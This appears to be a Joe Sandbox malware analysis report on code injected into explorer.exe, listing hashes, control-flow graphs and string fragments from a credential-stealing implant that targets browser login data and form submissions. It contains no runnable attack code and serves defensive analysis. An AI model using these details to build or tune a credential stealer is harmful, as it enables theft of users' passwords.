                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: socket
                                                                                              • String ID: sock
                                                                                              • API String ID: 98920635-2415254727
                                                                                              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                              • Instruction ID: c88bfd39564cd5b77a3b329841367e5ab840ea9b8eb2cafec3135edef8e50530
                                                                                              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                              • Instruction Fuzzy Hash: 3D0121706187188FCB84EF1CD048B54BBE0FB59314F1545ADD45ECB266C7B5C9818B86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 417 fd9b2dd-fd9b320 call fda6942 420 fd9b3fa-fd9b40e 417->420 421 fd9b326 417->421 422 fd9b328-fd9b339 SleepEx 421->422 422->422 423 fd9b33b-fd9b341 422->423 424 fd9b34b-fd9b352 423->424 425 fd9b343-fd9b349 423->425 427 fd9b370-fd9b376 424->427 428 fd9b354-fd9b35a 424->428 425->424 426 fd9b35c-fd9b36a call fda5f12 425->426 426->427 430 fd9b378-fd9b37e 427->430 431 fd9b3b7-fd9b3bd 427->431 428->426 428->427 430->431 435 fd9b380-fd9b38a 430->435 432 fd9b3bf-fd9b3cf call fd9be72 431->432 433 fd9b3d4-fd9b3db 431->433 432->433 433->422 437 fd9b3e1-fd9b3f5 call fd9b0f2 433->437 435->431 438 fd9b38c-fd9b3b1 call fd9c432 435->438 437->422 438->431
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                              • Instruction ID: d9e08b00f02e6302c347fc63c5904b02a8c0e32be69f3664920701c682c14bf9
                                                                                              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                              • Instruction Fuzzy Hash: 33314E74618B09DADFA4EFA990882E5B7A1FB94300F85426FC91DCB107C775A250CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 453 fd9b412-fd9b446 call fda6942 456 fd9b448-fd9b472 call fda8c9e CreateThread 453->456 457 fd9b473-fd9b47d 453->457
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844738729.000000000FCD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FCD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_fcd0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                              • Instruction ID: 356c5110fd896de95b84ff69cc72a5ed182b48124bd5fe55b9232743c7d60a4f
                                                                                              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                              • Instruction Fuzzy Hash: ACF0F630268B484FDBC8EF2CD48563AF3D0FBE8214F45063EA94DC3265DA79C5828B16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                              • API String ID: 0-393284711
                                                                                              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                              • Instruction ID: 1b00e5c6f18b88b8bded5d4d6a21c12ce8344f6ba3ee5cef923ba4f08ea452fd
                                                                                              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                              • Instruction Fuzzy Hash: CAE16B70618F488FCBA4EF68C4947EABBE1FB58301F404A2E959BC7655DF30A941CB85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                              • API String ID: 0-2916316912
                                                                                              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                              • Instruction ID: 36ad1183cb5086263242be1b54754b7f205397a4febea1ffe7de00c77bc1e680
                                                                                              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                              • Instruction Fuzzy Hash: 8AB19D30A18B488EDB15EF68C485AEEBBF1FF98300F504A1ED59BC7251DF7099058B85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                              • API String ID: 0-1539916866
                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                              • Instruction ID: 81d61c128b1d5d847bdbcdfc8fe306d11df46bef69ff47cbd5335bcb8ca8a81f
                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                              • Instruction Fuzzy Hash: B741E270A18B088FDB18DF88A4457BE7BE2FB88708F44025ED909D3241DBB19D85CBD6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                              • API String ID: 0-355182820
                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                              • Instruction ID: 7aea655424b29cbf534c5d78cf53df4ffe15035273e2c07f28e03c6c2b6afe4f
                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                              • Instruction Fuzzy Hash: 01C15B70218B099FC758EF28C4956EAFBE5FB98304F404B2E959BC7610DF30A955CB86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                              • API String ID: 0-97273177
                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                              • Instruction ID: 8862a70fb51c4b20b2526fa164c341a288886b1a9ea136c30fc3efe6a174fa85
                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                              • Instruction Fuzzy Hash: 7E51C6315187488FD719DF18D4816EAB7E6FBC5700F501A2EE9CBC7642DBB49906CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                              • API String ID: 0-639201278
                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                              • Instruction ID: a9d1cba105ed338a785dcc41e1f293c9ea51617144154c2df801f93d5718281a
                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                              • Instruction Fuzzy Hash: 3FC18C70618A198FC758EB68D495AEABBE5FB98300F45472E854FC7250DF30EE42CB85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                              • API String ID: 0-639201278
                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                              • Instruction ID: 1eb8a0236c4d82fdef283f28e0258ac97da5bfc1e1a0077639f4ff699e70b354
                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                              • Instruction Fuzzy Hash: 12C1AE70618A198FC758EB68D495AEABBE5FB98300F45472E854FC7250DF30EE42CB85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                              • API String ID: 0-2058692283
                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                              • Instruction ID: 27c2fa067e8d553ad9e89c5c2b7944b8bcc0f9f3634da017df606a0f4c1caec2
                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                              • Instruction Fuzzy Hash: EDA18070A187488FDB19EFA8D4447EEBBE1FF98300F404A2ED58AD7251EF7099458789
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                              • API String ID: 0-2058692283
                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                              • Instruction ID: de71500488ef99315cc7661012d32e75157acfdf5b00138386ade61071553f5c
                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                              • Instruction Fuzzy Hash: EE918070A187488BDB19EFA8D444BEEBBE1FF98300F40462ED58AD7251EF7099458B85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $.$e$n$v
                                                                                              • API String ID: 0-1849617553
                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                              • Instruction ID: c6ab3a4d1331c7e53328a9ed7bf80da903cb0b8a5376e1ed108f23435f097cde
                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                              • Instruction Fuzzy Hash: 54715131A18B498FD758EFA8D4846EAB7F1FF98304F00062FD54AC7261EB71D9458B85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                              • API String ID: 0-1970020201
                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                              • Instruction ID: eb5b8f5fba5981146c287890af5485dd5f4401dcfa0b50897cabd051a58f6233
                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                              • Instruction Fuzzy Hash: E1513AB0918B4C8BDB64EFA4C045AEEB7E1FF58301F404A2ED59BE7214EF7095418B89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                              • API String ID: 0-1610437797
                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                              • Instruction ID: a829ae0a53a8ef366ecc00936f7396be587141be401974d8a21b6516c8f65b0e
                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                              • Instruction Fuzzy Hash: E1415430618B8C8FCBB5EF2498557EABBE5FB98301F54462E995EC7240EF30D9458782
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                              • API String ID: 0-327345718
                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                              • Instruction ID: 271f1d10862e33f3981dbdc0bedc6d553e9982e8692cae77031031b00cf71e63
                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                              • Instruction Fuzzy Hash: 9B415E30A18E1D8FCB54FF6880957AD7BF1FB58308F84456AA94EDB610DB70D9808B86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .dll$el32$h$kern
                                                                                              • API String ID: 0-4264704552
                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                              • Instruction ID: 5944251f464b2e6e51959444b3b925a4103eb449c4d64209a0586d55f014167b
                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                              • Instruction Fuzzy Hash: AF418F70608B4C8FD7A9DF6884843AAFBE1FB98300F144B6E959EC3655DB70C985CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $Snif$f fr$om:
                                                                                              • API String ID: 0-3434893486
                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                              • Instruction ID: 5dc6cbc8a79b331d9e7e1efde50db1e39cec27d916daac87594772f5d15f21fe
                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                              • Instruction Fuzzy Hash: 7B31E77151CB485FD71AEB28C4846DABBD4FB84300F504D1EE59BC7692EE30AA49CB43
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $Snif$f fr$om:
                                                                                              • API String ID: 0-3434893486
                                                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                              • Instruction ID: 4ced49ef53236bb84f8a1a5d504372acf4f484405f93730c0c85fa99fa25c2ce
                                                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                              • Instruction Fuzzy Hash: DA31F671518B486FD71AEB24C4846DABBD4FB94300F404E1EE59BC7656EE30E905CA43
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                              • API String ID: 0-3136806129
                                                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                              • Instruction ID: ccc953df9fbad57b061d075b415a0a4f4e25c50d2e579e4edc23d531d6f67048
                                                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                              • Instruction Fuzzy Hash: C3314D70118B188FCB84EF698495BAABBE1FBD8300F844A6D954FCB255DF30C945C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                              • API String ID: 0-3136806129
                                                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                              • Instruction ID: 9ab48ec00638bb67a4637a3a6f61b7e71e82687b2dcb477670eebe6ca9e45f3b
                                                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                              • Instruction Fuzzy Hash: E6315E70118B088FC794EF698494BAABBE1FBD8300F844A6D954ACB255DF30C945C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                              • API String ID: 0-319646191
                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                              • Instruction ID: eadb4a84bcaf66246a29836ff6f7e3064a6f370d084d9d6b06d9ffd6227007a7
                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                              • Instruction Fuzzy Hash: 5C31D131A14A0C8BCB05EFA8C8847EEBBE1FB98214F40062AD54ED7240DE748A45C789
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                              • API String ID: 0-319646191
                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                              • Instruction ID: 9bcdd7218d449f3f7bc02d9addbc717593986d88f82a9a30b0c2f839a7141d7d
                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                              • Instruction Fuzzy Hash: F421D030A10A0C8BCB05EFA8C8847EEBBE1FF98214F40462AD55BD7250DF748A05CB89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .$l$l$t
                                                                                              • API String ID: 0-168566397
                                                                                              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                              • Instruction ID: 5d7b001a35dd19c4e820e210e2db33117cd10fe8237e537099688bc6959848bc
                                                                                              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                              • Instruction Fuzzy Hash: 8C215C70A24A0D9FDB48EFA8D0547EDBAF1FB98314F504A2ED10AD3A10DB7499918B84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .$l$l$t
                                                                                              • API String ID: 0-168566397
                                                                                              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                              • Instruction ID: 8881990c55252ce7125ea33199574d8d68b31fd7207a856528505221916aa393
                                                                                              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                              • Instruction Fuzzy Hash: 01216D70A24A0D9FDB48EFA8D0547EDBBF1FB58314F504A2ED10AD3A00DB7499518B84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: auth$logi$pass$user
                                                                                              • API String ID: 0-2393853802
                                                                                              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                              • Instruction ID: 1ab698bc5ec1e93adee1eb5061dc343835eef4af829958a3758111ca6238bcbb
                                                                                              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                              • Instruction Fuzzy Hash: 1321CD70624B0D8BCB05DF9998906EEBBE1EFC8344F004A1AE40AEB254D7B0D9158BC2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:590
                                                                                              Total number of Limit Nodes:73
                                                                                              execution_graph 101767 1ef13d 101770 1eb9d0 101767->101770 101771 1eb9f6 101770->101771 101778 1d9d40 101771->101778 101773 1eba02 101776 1eba26 101773->101776 101786 1d8f30 101773->101786 101824 1ea6b0 101776->101824 101781 1d9d4d 101778->101781 101827 1d9c90 101778->101827 101780 1d9d54 101780->101773 101781->101780 101839 1d9c30 101781->101839 101787 1d8f57 101786->101787 102258 1db1c0 101787->102258 101789 1d8f69 102262 1daf10 101789->102262 101791 1d8f86 101793 1d8f8d 101791->101793 102333 1dae40 LdrLoadDll 101791->102333 101820 1d90f2 101793->101820 102266 1df380 101793->102266 101795 1d8ffc 102278 1df410 101795->102278 101797 1d9006 101798 1ebf90 2 API calls 101797->101798 101797->101820 101799 1d902a 101798->101799 101800 1ebf90 2 API calls 101799->101800 101801 1d903b 101800->101801 101802 1ebf90 2 API calls 101801->101802 101803 1d904c 101802->101803 102290 1dca90 101803->102290 101805 1d9059 101806 1e4a50 8 API calls 101805->101806 101807 1d9066 101806->101807 101808 1e4a50 8 API calls 101807->101808 101809 1d9077 101808->101809 101810 1d90a5 101809->101810 101811 1d9084 101809->101811 101812 1e4a50 8 API calls 101810->101812 102300 1dd620 101811->102300 101819 1d90c1 101812->101819 101815 1d90e9 101817 1d8d00 21 API calls 101815->101817 101817->101820 101818 1d9092 102316 1d8d00 101818->102316 101819->101815 102334 1dd6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 101819->102334 101820->101776 101825 1eaf60 LdrLoadDll 101824->101825 101826 1ea6cf 101825->101826 101859 1e8bc0 101827->101859 101831 1d9cb6 101831->101781 101832 1d9cac 101832->101831 101866 1eb2b0 101832->101866 101834 1d9cf3 101834->101831 101877 1d9ab0 101834->101877 101836 1d9d13 101883 1d9620 LdrLoadDll 101836->101883 101838 1d9d25 101838->101781 101840 1d9c40 101839->101840 102232 1eb5a0 101840->102232 101843 1eb5a0 LdrLoadDll 101844 